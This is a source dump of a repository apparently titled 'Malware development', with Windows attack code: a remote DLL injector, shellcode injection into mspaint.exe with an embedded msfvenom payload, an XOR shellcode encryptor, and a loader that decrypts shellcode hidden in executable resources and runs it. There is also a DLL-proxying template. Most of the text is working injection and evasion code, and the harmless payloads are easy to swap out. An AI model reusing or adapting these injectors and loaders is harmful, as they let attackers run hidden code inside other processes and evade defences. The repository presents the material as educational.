├── README.md ├── dll-injector ├── dll-injector.cpp └── dll-injector.exe ├── dll-proxying ├── dll_exports.py └── dllmain.cpp ├── executable-resources ├── encrypt-shellcode.py ├── executable-resources.cpp ├── executable_resources_original.exe └── executable_resources_with_shellcode.exe ├── local-dll-injection ├── local-dll-injection.cpp └── local-dll-injection.exe ├── malicious-dll ├── evil-dll.cpp └── evil-dll.dll ├── process-injection ├── process-injection.cpp └── process-injection.exe ├── self-injection ├── dll_exports.py ├── exports.json ├── self-injection.cpp └── self-injection.exe └── txt-extension-hijacking ├── registry_keys.txt ├── txt_to_malware.cpp └── txt_to_malware.exe /README.md: -------------------------------------------------------------------------------- 1 | # Malware development 2 | Malware attacks/techniques explained. 3 | 4 | ## Attacks/Techniques explained 5 | - Self-injection 6 | - Process injection 7 | - Local DLL injection/Self-DLL injection 8 | - Remote DLL injection/DLL injector 9 | - Using executable resources to hide images with embedded shellcode 10 | - DLL Proxing 11 | - Default txt extension hijacking 12 | 13 | ## Series Playlist 14 | - https://www.youtube.com/watch?v=zEk3mi4Pt_E&list=PLybHbyv-eKf5_gZ1EfFjkjCXTUksOR6TN&index=3 15 | -------------------------------------------------------------------------------- /dll-injector/dll-injector.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(int argc, char** argv) { 5 | if (argc != 3) { 6 | printf("usage: dll-injector.exe \n"); 7 | return 1; 8 | } 9 | PCSTR dll_path = argv[1]; 10 | DWORD PID = atoi(argv[2]); 11 | HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID); 12 | if (hProcess == NULL) { 13 | printf("Failed to retrieve handle to remote process: %d\n", GetLastError()); 14 | return 1; 15 | } 16 | LPVOID allocated_mem = VirtualAllocEx(hProcess, NULL, strlen(dll_path) + 1, (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE); 17 | if (allocated_mem == NULL) { 18 | printf("Failed to allocated memory in remote process: %d\n", GetLastError()); 19 | return 1; 20 | } 21 | printf("memory allocated at: %p\n", allocated_mem); 22 | WriteProcessMemory(hProcess, allocated_mem, dll_path, strlen(dll_path) + 1, NULL); 23 | HMODULE kernel32Base = GetModuleHandleW(L"kernel32.dll"); 24 | if (kernel32Base == NULL) { 25 | printf("Failed to retrieve handle to kernel32.dll: %d\n", GetLastError()); 26 | return 1; 27 | } 28 | FARPROC load_library_address = GetProcAddress(kernel32Base, "LoadLibraryA"); 29 | HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)load_library_address, allocated_mem, 0, NULL); 30 | if (hThread == NULL) { 31 | printf("Failed to create thread in remote process: %d\n", GetLastError()); 32 | return 1; 33 | } 34 | WaitForSingleObject(hThread, INFINITE); 35 | CloseHandle(hProcess); 36 | 37 | return 0; 38 | } 39 | -------------------------------------------------------------------------------- /dll-injector/dll-injector.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/leetCipher/Malware.development/b716460d7f7eaa113752986b34cd0a88a293bd63/dll-injector/dll-injector.exe -------------------------------------------------------------------------------- /dll-proxying/dll_exports.py: -------------------------------------------------------------------------------- 1 | import pefile 2 | import sys 3 | 4 | def main(): 5 | exports_list = [] 6 | pe = pefile.PE(sys.argv[1]) 7 | for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols: 8 | try: 9 | exports_list.append(exp.name.decode('utf-8')) 10 | except: 11 | continue 12 | 13 | fd = open('exports.txt','w') 14 | for exp in exports_list: 15 | fd.write('#pragma comment(linker, "/export:{}={}.{}")\n'.format(exp, sys.argv[1].split(".")[0], exp)) 16 | fd.close() 17 | 18 | 19 | if __name__ == "__main__": 20 | if len(sys.argv) != 2: 21 | print("Usage: python dll_exports.py ") 22 | else: 23 | main() -------------------------------------------------------------------------------- /dll-proxying/dllmain.cpp: -------------------------------------------------------------------------------- 1 | #include "pch.h" 2 | #include 3 | 4 | /* 5 | ** Make sure to include the DLL that has the exported functions in the project directory or the build will fail 6 | ** Or instead, you can provide the full path to the DLL in the linker options using visual studio 2022 7 | ** compiler directives should look like this: #pragma comment(linker, "/export:exportedfunction=DLLName.exportedfunction") 8 | */ 9 | 10 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { 11 | switch (ul_reason_for_call) { 12 | case DLL_PROCESS_ATTACH: 13 | // Your code goes here 14 | break; 15 | case DLL_PROCESS_DETACH: 16 | case DLL_THREAD_ATTACH: 17 | case DLL_THREAD_DETACH: 18 | break; 19 | } 20 | return TRUE; 21 | } -------------------------------------------------------------------------------- /executable-resources/encrypt-shellcode.py: -------------------------------------------------------------------------------- 1 | shellcode = [ 2 | 0x48, 0x31, 0xff, 0x48, 0xf7, 0xe7, 0x65, 0x48, 0x8b, 0x58, 0x60, 0x48, 0x8b, 0x5b, 0x18, 0x48, 3 | 0x8b, 0x5b, 0x20, 0x48, 0x8b, 0x1b, 0x48, 0x8b, 0x1b, 0x48, 0x8b, 0x5b, 0x20, 0x49, 0x89, 0xd8, 4 | 0x8b, 0x5b, 0x3c, 0x4c, 0x01, 0xc3, 0x48, 0x31, 0xc9, 0x66, 0x81, 0xc1, 0xff, 0x88, 0x48, 0xc1, 5 | 0xe9, 0x08, 0x8b, 0x14, 0x0b, 0x4c, 0x01, 0xc2, 0x4d, 0x31, 0xd2, 0x44, 0x8b, 0x52, 0x1c, 0x4d, 6 | 0x01, 0xc2, 0x4d, 0x31, 0xdb, 0x44, 0x8b, 0x5a, 0x20, 0x4d, 0x01, 0xc3, 0x4d, 0x31, 0xe4, 0x44, 7 | 0x8b, 0x62, 0x24, 0x4d, 0x01, 0xc4, 0xeb, 0x32, 0x5b, 0x59, 0x48, 0x31, 0xc0, 0x48, 0x89, 0xe2, 8 | 0x51, 0x48, 0x8b, 0x0c, 0x24, 0x48, 0x31, 0xff, 0x41, 0x8b, 0x3c, 0x83, 0x4c, 0x01, 0xc7, 0x48, 9 | 0x89, 0xd6, 0xf3, 0xa6, 0x74, 0x05, 0x48, 0xff, 0xc0, 0xeb, 0xe6, 0x59, 0x66, 0x41, 0x8b, 0x04, 10 | 0x44, 0x41, 0x8b, 0x04, 0x82, 0x4c, 0x01, 0xc0, 0x53, 0xc3, 0x48, 0x31, 0xc9, 0x80, 0xc1, 0x07, 11 | 0x48, 0xb8, 0x0f, 0xa8, 0x96, 0x91, 0xba, 0x87, 0x9a, 0x9c, 0x48, 0xf7, 0xd0, 0x48, 0xc1, 0xe8, 12 | 0x08, 0x50, 0x51, 0xe8, 0xb0, 0xff, 0xff, 0xff, 0x49, 0x89, 0xc6, 0x48, 0x31, 0xc9, 0x48, 0xf7, 13 | 0xe1, 0x50, 0x48, 0xb8, 0x9c, 0x9e, 0x93, 0x9c, 0xd1, 0x9a, 0x87, 0x9a, 0x48, 0xf7, 0xd0, 0x50, 14 | 0x48, 0x89, 0xe1, 0x48, 0xff, 0xc2, 0x48, 0x83, 0xec, 0x20, 0x41, 0xff, 0xd6 15 | ] 16 | 17 | key = "secret" # encryption key 18 | ct = [] # ciphertext 19 | 20 | # XOR encrypt the shellcode 21 | for i in range(len(shellcode)): 22 | ct.append(hex(shellcode[i] ^ ord(key[i % len(key)]))) 23 | 24 | # remove the '0x' prefix and print out the encrypted shellocde 25 | for b in ct: 26 | b = b.replace("0x", "") 27 | print("{} ".format(b.zfill(2)), end = "") 28 | 29 | -------------------------------------------------------------------------------- /executable-resources/executable-resources.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #define shellcodeSize 0xCD 6 | 7 | 8 | void ExtractAndExecuteShellcode(HMODULE hModule, LPCWSTR resourceName, LPCWSTR resourceType) { 9 | // Find the resource in the executable 10 | HRSRC hRes = FindResource(hModule, resourceName, resourceType); 11 | if (!hRes) { 12 | printf("Failed to find resource. Error: %lu\n", GetLastError()); 13 | return; 14 | } 15 | 16 | // Load the resource into memory 17 | HGLOBAL hLoadedRes = LoadResource(hModule, hRes); 18 | if (!hLoadedRes) { 19 | printf("Failed to load resource. Error: %lu\n", GetLastError()); 20 | return; 21 | } 22 | 23 | // Get a pointer to the resource data 24 | LPVOID pResData = LockResource(hLoadedRes); 25 | if (!pResData) { 26 | printf("Failed to lock resource. Error: %lu\n", GetLastError()); 27 | return; 28 | } 29 | 30 | // Get the size of the resource 31 | DWORD resSize = SizeofResource(hModule, hRes); 32 | if (resSize == 0) { 33 | printf("Failed to get resource size. Error: %lu\n", GetLastError()); 34 | return; 35 | } 36 | 37 | // Get the shellcode from the resource 38 | LPBYTE enc_shellcode = (LPBYTE)pResData + (resSize - shellcodeSize); 39 | 40 | // XOR decrypt the shellcode with the key "secret" 41 | LPCSTR key = "secret"; 42 | SIZE_T keyLength = strlen(key); 43 | BYTE shellcode[shellcodeSize]; 44 | 45 | for (SIZE_T i = 0; i < shellcodeSize; i++) { 46 | shellcode[i] = enc_shellcode[i] ^ key[i % keyLength]; 47 | } 48 | 49 | // Allocate virtual memory for the shellcode 50 | LPVOID virtualMemory = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 51 | 52 | if (!virtualMemory) { 53 | printf("Failed to allocate virtual memory. Error: %lu\n", GetLastError()); 54 | return; 55 | } 56 | 57 | // Copy the decrypted shellcode into the allocated memory 58 | RtlCopyMemory(virtualMemory, shellcode, shellcodeSize); 59 | 60 | // Create a thread to execute the shellcode 61 | HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)virtualMemory, NULL, 0, NULL); 62 | 63 | if (hThread == NULL) { 64 | printf("Failed to create thread: %lu\n", GetLastError()); 65 | return; 66 | } 67 | // Halt execution until created thread returns 68 | WaitForSingleObject(hThread, INFINITE); 69 | 70 | // Close handle to thread 71 | CloseHandle(hThread); 72 | 73 | // Free the allocated virtual memory 74 | VirtualFree(virtualMemory, 0, MEM_RELEASE); 75 | } 76 | 77 | 78 | int main(int argc, char **argv) { 79 | // Get the handle to the current executable 80 | HMODULE hModule = GetModuleHandle(NULL); 81 | if (!hModule) { 82 | printf("Failed to get module handle. Error: %lu\n", GetLastError()); 83 | return 1; 84 | } 85 | 86 | LPCWSTR resourceName = L"mrbeast"; // Resource ID 87 | LPCWSTR resourceType = RT_RCDATA; // Resource type 88 | 89 | // Extract, decrypt and execute shellcode 90 | ExtractAndExecuteShellcode(hModule, resourceName, resourceType); 91 | 92 | return 0; 93 | } -------------------------------------------------------------------------------- /executable-resources/executable_resources_original.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/leetCipher/Malware.development/b716460d7f7eaa113752986b34cd0a88a293bd63/executable-resources/executable_resources_original.exe -------------------------------------------------------------------------------- /executable-resources/executable_resources_with_shellcode.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/leetCipher/Malware.development/b716460d7f7eaa113752986b34cd0a88a293bd63/executable-resources/executable_resources_with_shellcode.exe -------------------------------------------------------------------------------- /local-dll-injection/local-dll-injection.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | DWORD WINAPI threadFunc(LPVOID lpParam) { 5 | // code to run by the thread 6 | printf("Thread is running...\n"); 7 | return 0; 8 | } 9 | 10 | 11 | int main(int argc, char **argv) { 12 | // Load the DLL 13 | PCSTR path_to_dll = argv[1]; 14 | HINSTANCE hDll = LoadLibraryA(argv[1]); 15 | if (hDll == NULL) { 16 | printf("Failed to load DLL.\n"); 17 | return 1; 18 | } 19 | 20 | // Create a thread 21 | HANDLE hThread = CreateThread(NULL, 0, threadFunc, NULL, 0, NULL); 22 | if (hThread == NULL) { 23 | printf("Failed to create thread: %d\n", GetLastError()); 24 | return 1; 25 | } 26 | 27 | // Wait for a short time 28 | WaitForSingleObject(hThread, INFINITE); 29 | 30 | // Close the thread handle 31 | CloseHandle(hThread); 32 | 33 | // Free the DLL 34 | FreeLibrary(hDll); 35 | 36 | return 0; 37 | } 38 | -------------------------------------------------------------------------------- /local-dll-injection/local-dll-injection.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/leetCipher/Malware.development/b716460d7f7eaa113752986b34cd0a88a293bd63/local-dll-injection/local-dll-injection.exe -------------------------------------------------------------------------------- /malicious-dll/evil-dll.cpp: -------------------------------------------------------------------------------- 1 | #include "pch.h" 2 | #include 3 | 4 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { 5 | switch (ul_reason_for_call) { 6 | case DLL_PROCESS_ATTACH: 7 | MessageBoxA(NULL, "Malicious DLL Attached and Executed!!!!!!!", "WARNING", MB_ICONEXCLAMATION); 8 | break; 9 | case DLL_PROCESS_DETACH: 10 | MessageBoxA(NULL, "Malicious DLL Detached!", "WARNING", MB_ICONEXCLAMATION); 11 | break; 12 | case DLL_THREAD_ATTACH: 13 | MessageBoxA(NULL, "Thread Created!", "WARNING", MB_ICONEXCLAMATION); 14 | break; 15 | case DLL_THREAD_DETACH: 16 | MessageBoxA(NULL, "Thread Terminated!", "WARNING", MB_ICONEXCLAMATION); 17 | break; 18 | } 19 | return TRUE; 20 | } -------------------------------------------------------------------------------- /malicious-dll/evil-dll.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/leetCipher/Malware.development/b716460d7f7eaa113752986b34cd0a88a293bd63/malicious-dll/evil-dll.dll -------------------------------------------------------------------------------- /process-injection/process-injection.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main(int argc, char** argv) { 6 | // Define MessageBox shellcode (x64) 7 | unsigned char shellcode[] = 8 | "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41" 9 | "\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60" 10 | "\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72" 11 | "\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac" 12 | "\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2" 13 | "\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48" 14 | "\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f" 15 | "\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49" 16 | "\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01" 17 | "\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01" 18 | "\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1" 19 | "\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41" 20 | "\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b" 21 | "\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58" 22 | "\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" 23 | "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7" 24 | "\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\xfe\x00\x00\x00\x3e" 25 | "\x4c\x8d\x85\x14\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83" 26 | "\x56\x07\xff\xd5\x48\x31\xc9\x41\xba\xf0\xb5\xa2\x56\xff" 27 | "\xd5\x53\x68\x65\x6c\x6c\x63\x6f\x64\x65\x20\x62\x79\x20" 28 | "\x6d\x73\x66\x76\x65\x6e\x6f\x6d\x00\x53\x68\x65\x6c\x6c" 29 | "\x63\x6f\x64\x65\x00"; 30 | 31 | // Init PROCESSENTRY32 struct 32 | PROCESSENTRY32 pe32; 33 | // Set the size member to the whole size of the struct 34 | pe32.dwSize = sizeof(PROCESSENTRY32); 35 | // Take a snapshot of all running processes 36 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 37 | // Get the first process info in the snapshot 38 | Process32First(snapshot, &pe32); 39 | // Loop through the whole snapshot until `mspaint.exe` is found 40 | do { 41 | // Check if we have a match for `mspaint.exe` 42 | if (wcscmp(pe32.szExeFile, L"mspaint.exe") == 0) { 43 | // Obtain a handle to `mspaint.exe` 44 | HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID); 45 | // Allocate memory in `mspaint.exe` 46 | LPVOID allocated_mem = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); 47 | 48 | if (allocated_mem == NULL) { 49 | 50 | printf("Memory allocation failed: %ul\n", GetLastError()); 51 | 52 | return 1; 53 | } 54 | 55 | printf("Memory page allocated at: 0x%p\n", allocated_mem); 56 | // Write shellcode to the allocated memory in `mspaint.exe` 57 | WriteProcessMemory(hProcess, allocated_mem, shellcode, sizeof(shellcode), NULL); 58 | // Create a thread to execute shellcode 59 | HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)allocated_mem, NULL, 0, NULL); 60 | 61 | if (hThread == NULL) { 62 | 63 | printf("Falied to obtain handle to process: %ul\n", GetLastError()); 64 | 65 | return 1; 66 | } 67 | // Halt execution until thread returns 68 | WaitForSingleObject(hThread, INFINITE); 69 | // Free allocated memory in `mspaint.exe` 70 | VirtualFreeEx(hProcess, allocated_mem, 0, MEM_RELEASE); 71 | // Close the handle to the created thread 72 | CloseHandle(hThread); 73 | // Close the handle to `mspaint.exe` process 74 | CloseHandle(hProcess); 75 | 76 | break; 77 | } 78 | // Enumerate the snapshot 79 | } while (Process32Next(snapshot, &pe32)); 80 | 81 | return 0; 82 | } 83 | -------------------------------------------------------------------------------- /process-injection/process-injection.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/leetCipher/Malware.development/b716460d7f7eaa113752986b34cd0a88a293bd63/process-injection/process-injection.exe -------------------------------------------------------------------------------- /self-injection/dll_exports.py: -------------------------------------------------------------------------------- 1 | import pefile 2 | import json 3 | 4 | exports_list = [] 5 | 6 | pe = pefile.PE("C:\\Windows\\System32\\kernel32.dll") 7 | for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols: 8 | try: 9 | exports_list.append(exp.name.decode("UTF-8")) 10 | except: 11 | continue 12 | 13 | exports_json = {"exports": exports_list} 14 | open("exports.json", "wb").write(json.dumps(exports_json).encode()) -------------------------------------------------------------------------------- /self-injection/exports.json: -------------------------------------------------------------------------------- 1 | {"exports": ["AcquireSRWLockExclusive", "AcquireSRWLockShared", "ActivateActCtx", "ActivateActCtxWorker", "AddAtomA", "AddAtomW", "AddConsoleAliasA", "AddConsoleAliasW", "AddDllDirectory", "AddIntegrityLabelToBoundaryDescriptor", "AddLocalAlternateComputerNameA", "AddLocalAlternateComputerNameW", "AddRefActCtx", "AddRefActCtxWorker", "AddResourceAttributeAce", "AddSIDToBoundaryDescriptor", "AddScopedPolicyIDAce", "AddSecureMemoryCacheCallback", "AddVectoredContinueHandler", "AddVectoredExceptionHandler", "AdjustCalendarDate", "AllocConsole", "AllocateUserPhysicalPages", "AllocateUserPhysicalPagesNuma", "AppPolicyGetClrCompat", "AppPolicyGetCreateFileAccess", "AppPolicyGetLifecycleManagement", "AppPolicyGetMediaFoundationCodecLoading", "AppPolicyGetProcessTerminationMethod", "AppPolicyGetShowDeveloperDiagnostic", "AppPolicyGetThreadInitializationType", "AppPolicyGetWindowingModel", "AppXGetOSMaxVersionTested", "ApplicationRecoveryFinished", "ApplicationRecoveryInProgress", "AreFileApisANSI", "AssignProcessToJobObject", "AttachConsole", "BackupRead", "BackupSeek", "BackupWrite", "BaseCheckAppcompatCache", "BaseCheckAppcompatCacheEx", "BaseCheckAppcompatCacheExWorker", "BaseCheckAppcompatCacheWorker", "BaseCheckElevation", "BaseCleanupAppcompatCacheSupport", "BaseCleanupAppcompatCacheSupportWorker", "BaseDestroyVDMEnvironment", "BaseDllReadWriteIniFile", "BaseDumpAppcompatCache", "BaseDumpAppcompatCacheWorker", "BaseElevationPostProcessing", "BaseFlushAppcompatCache", "BaseFlushAppcompatCacheWorker", "BaseFormatObjectAttributes", "BaseFormatTimeOut", "BaseFreeAppCompatDataForProcessWorker", "BaseGenerateAppCompatData", "BaseGetNamedObjectDirectory", "BaseInitAppcompatCacheSupport", "BaseInitAppcompatCacheSupportWorker", "BaseIsAppcompatInfrastructureDisabled", "BaseIsAppcompatInfrastructureDisabledWorker", "BaseIsDosApplication", "BaseQueryModuleData", "BaseReadAppCompatDataForProcessWorker", "BaseSetLastNTError", "BaseThreadInitThunk", "BaseUpdateAppcompatCache", "BaseUpdateAppcompatCacheWorker", "BaseUpdateVDMEntry", "BaseVerifyUnicodeString", "BaseWriteErrorElevationRequiredEvent", "Basep8BitStringToDynamicUnicodeString", "BasepAllocateActivationContextActivationBlock", "BasepAnsiStringToDynamicUnicodeString", "BasepAppContainerEnvironmentExtension", "BasepAppXExtension", "BasepCheckAppCompat", "BasepCheckWebBladeHashes", "BasepCheckWinSaferRestrictions", "BasepConstructSxsCreateProcessMessage", "BasepCopyEncryption", "BasepFinishPackageActivationForSxS", "BasepFreeActivationContextActivationBlock", "BasepFreeAppCompatData", "BasepGetAppCompatData", "BasepGetComputerNameFromNtPath", "BasepGetExeArchType", "BasepGetPackageActivationTokenForSxS", "BasepInitAppCompatData", "BasepIsProcessAllowed", "BasepMapModuleHandle", "BasepNotifyLoadStringResource", "BasepPostSuccessAppXExtension", "BasepProcessInvalidImage", "BasepQueryAppCompat", "BasepQueryModuleChpeSettings", "BasepReleaseAppXContext", "BasepReleaseSxsCreateProcessUtilityStruct", "BasepReportFault", "BasepSetFileEncryptionCompression", "Beep", "BeginUpdateResourceA", "BeginUpdateResourceW", "BindIoCompletionCallback", "BuildCommDCBA", "BuildCommDCBAndTimeoutsA", "BuildCommDCBAndTimeoutsW", "BuildCommDCBW", "CallNamedPipeA", "CallNamedPipeW", "CallbackMayRunLong", "CancelDeviceWakeupRequest", "CancelIo", "CancelIoEx", "CancelSynchronousIo", "CancelThreadpoolIo", "CancelTimerQueueTimer", "CancelWaitableTimer", "CeipIsOptedIn", "ChangeTimerQueueTimer", "CheckAllowDecryptedRemoteDestinationPolicy", "CheckElevation", "CheckElevationEnabled", "CheckForReadOnlyResource", "CheckForReadOnlyResourceFilter", "CheckIsMSIXPackage", "CheckNameLegalDOS8Dot3A", "CheckNameLegalDOS8Dot3W", "CheckRemoteDebuggerPresent", "CheckTokenCapability", "CheckTokenMembershipEx", "ClearCommBreak", "ClearCommError", "CloseConsoleHandle", "CloseHandle", "ClosePackageInfo", "ClosePrivateNamespace", "CloseProfileUserMapping", "ClosePseudoConsole", "CloseState", "CloseThreadpool", "CloseThreadpoolCleanupGroup", "CloseThreadpoolCleanupGroupMembers", "CloseThreadpoolIo", "CloseThreadpoolTimer", "CloseThreadpoolWait", "CloseThreadpoolWork", "CmdBatNotification", "CommConfigDialogA", "CommConfigDialogW", "CompareCalendarDates", "CompareFileTime", "CompareStringA", "CompareStringEx", "CompareStringOrdinal", "CompareStringW", "ConnectNamedPipe", "ConsoleMenuControl", "ContinueDebugEvent", "ConvertCalDateTimeToSystemTime", "ConvertDefaultLocale", "ConvertFiberToThread", "ConvertNLSDayOfWeekToWin32DayOfWeek", "ConvertSystemTimeToCalDateTime", "ConvertThreadToFiber", "ConvertThreadToFiberEx", "CopyContext", "CopyFile2", "CopyFileA", "CopyFileExA", "CopyFileExW", "CopyFileTransactedA", "CopyFileTransactedW", "CopyFileW", "CopyLZFile", "CreateActCtxA", "CreateActCtxW", "CreateActCtxWWorker", "CreateBoundaryDescriptorA", "CreateBoundaryDescriptorW", "CreateConsoleScreenBuffer", "CreateDirectoryA", "CreateDirectoryExA", "CreateDirectoryExW", "CreateDirectoryTransactedA", "CreateDirectoryTransactedW", "CreateDirectoryW", "CreateEnclave", "CreateEventA", "CreateEventExA", "CreateEventExW", "CreateEventW", "CreateFiber", "CreateFiberEx", "CreateFile2", "CreateFileA", "CreateFileMappingA", "CreateFileMappingFromApp", "CreateFileMappingNumaA", "CreateFileMappingNumaW", "CreateFileMappingW", "CreateFileTransactedA", "CreateFileTransactedW", "CreateFileW", "CreateHardLinkA", "CreateHardLinkTransactedA", "CreateHardLinkTransactedW", "CreateHardLinkW", "CreateIoCompletionPort", "CreateJobObjectA", "CreateJobObjectW", "CreateJobSet", "CreateMailslotA", "CreateMailslotW", "CreateMemoryResourceNotification", "CreateMutexA", "CreateMutexExA", "CreateMutexExW", "CreateMutexW", "CreateNamedPipeA", "CreateNamedPipeW", "CreatePipe", "CreatePrivateNamespaceA", "CreatePrivateNamespaceW", "CreateProcessA", "CreateProcessAsUserA", "CreateProcessAsUserW", "CreateProcessInternalA", "CreateProcessInternalW", "CreateProcessW", "CreatePseudoConsole", "CreateRemoteThread", "CreateRemoteThreadEx", "CreateSemaphoreA", "CreateSemaphoreExA", "CreateSemaphoreExW", "CreateSemaphoreW", "CreateSymbolicLinkA", "CreateSymbolicLinkTransactedA", "CreateSymbolicLinkTransactedW", "CreateSymbolicLinkW", "CreateTapePartition", "CreateThread", "CreateThreadpool", "CreateThreadpoolCleanupGroup", "CreateThreadpoolIo", "CreateThreadpoolTimer", "CreateThreadpoolWait", "CreateThreadpoolWork", "CreateTimerQueue", "CreateTimerQueueTimer", "CreateToolhelp32Snapshot", "CreateUmsCompletionList", "CreateUmsThreadContext", "CreateWaitableTimerA", "CreateWaitableTimerExA", "CreateWaitableTimerExW", "CreateWaitableTimerW", "CtrlRoutine", "DeactivateActCtx", "DeactivateActCtxWorker", "DebugActiveProcess", "DebugActiveProcessStop", "DebugBreak", "DebugBreakProcess", "DebugSetProcessKillOnExit", "DecodePointer", "DecodeSystemPointer", "DefineDosDeviceA", "DefineDosDeviceW", "DelayLoadFailureHook", "DeleteAtom", "DeleteBoundaryDescriptor", "DeleteCriticalSection", "DeleteFiber", "DeleteFileA", "DeleteFileTransactedA", "DeleteFileTransactedW", "DeleteFileW", "DeleteProcThreadAttributeList", "DeleteSynchronizationBarrier", "DeleteTimerQueue", "DeleteTimerQueueEx", "DeleteTimerQueueTimer", "DeleteUmsCompletionList", "DeleteUmsThreadContext", "DeleteVolumeMountPointA", "DeleteVolumeMountPointW", "DequeueUmsCompletionListItems", "DeviceIoControl", "DisableThreadLibraryCalls", "DisableThreadProfiling", "DisassociateCurrentThreadFromCallback", "DiscardVirtualMemory", "DisconnectNamedPipe", "DnsHostnameToComputerNameA", "DnsHostnameToComputerNameExW", "DnsHostnameToComputerNameW", "DosDateTimeToFileTime", "DosPathToSessionPathA", "DosPathToSessionPathW", "DuplicateConsoleHandle", "DuplicateEncryptionInfoFileExt", "DuplicateHandle", "EnableThreadProfiling", "EncodePointer", "EncodeSystemPointer", "EndUpdateResourceA", "EndUpdateResourceW", "EnterCriticalSection", "EnterSynchronizationBarrier", "EnterUmsSchedulingMode", "EnumCalendarInfoA", "EnumCalendarInfoExA", "EnumCalendarInfoExEx", "EnumCalendarInfoExW", "EnumCalendarInfoW", "EnumDateFormatsA", "EnumDateFormatsExA", "EnumDateFormatsExEx", "EnumDateFormatsExW", "EnumDateFormatsW", "EnumLanguageGroupLocalesA", "EnumLanguageGroupLocalesW", "EnumResourceLanguagesA", "EnumResourceLanguagesExA", "EnumResourceLanguagesExW", "EnumResourceLanguagesW", "EnumResourceNamesA", "EnumResourceNamesExA", "EnumResourceNamesExW", "EnumResourceNamesW", "EnumResourceTypesA", "EnumResourceTypesExA", "EnumResourceTypesExW", "EnumResourceTypesW", "EnumSystemCodePagesA", "EnumSystemCodePagesW", "EnumSystemFirmwareTables", "EnumSystemGeoID", "EnumSystemGeoNames", "EnumSystemLanguageGroupsA", "EnumSystemLanguageGroupsW", "EnumSystemLocalesA", "EnumSystemLocalesEx", "EnumSystemLocalesW", "EnumTimeFormatsA", "EnumTimeFormatsEx", "EnumTimeFormatsW", "EnumUILanguagesA", "EnumUILanguagesW", "EnumerateLocalComputerNamesA", "EnumerateLocalComputerNamesW", "EraseTape", "EscapeCommFunction", "ExecuteUmsThread", "ExitProcess", "ExitThread", "ExitVDM", "ExpandEnvironmentStringsA", "ExpandEnvironmentStringsW", "ExpungeConsoleCommandHistoryA", "ExpungeConsoleCommandHistoryW", "FatalAppExitA", "FatalAppExitW", "FatalExit", "FileTimeToDosDateTime", "FileTimeToLocalFileTime", "FileTimeToSystemTime", "FillConsoleOutputAttribute", "FillConsoleOutputCharacterA", "FillConsoleOutputCharacterW", "FindActCtxSectionGuid", "FindActCtxSectionGuidWorker", "FindActCtxSectionStringA", "FindActCtxSectionStringW", "FindActCtxSectionStringWWorker", "FindAtomA", "FindAtomW", "FindClose", "FindCloseChangeNotification", "FindFirstChangeNotificationA", "FindFirstChangeNotificationW", "FindFirstFileA", "FindFirstFileExA", "FindFirstFileExW", "FindFirstFileNameTransactedW", "FindFirstFileNameW", "FindFirstFileTransactedA", "FindFirstFileTransactedW", "FindFirstFileW", "FindFirstStreamTransactedW", "FindFirstStreamW", "FindFirstVolumeA", "FindFirstVolumeMountPointA", "FindFirstVolumeMountPointW", "FindFirstVolumeW", "FindNLSString", "FindNLSStringEx", "FindNextChangeNotification", "FindNextFileA", "FindNextFileNameW", "FindNextFileW", "FindNextStreamW", "FindNextVolumeA", "FindNextVolumeMountPointA", "FindNextVolumeMountPointW", "FindNextVolumeW", "FindPackagesByPackageFamily", "FindResourceA", "FindResourceExA", "FindResourceExW", "FindResourceW", "FindStringOrdinal", 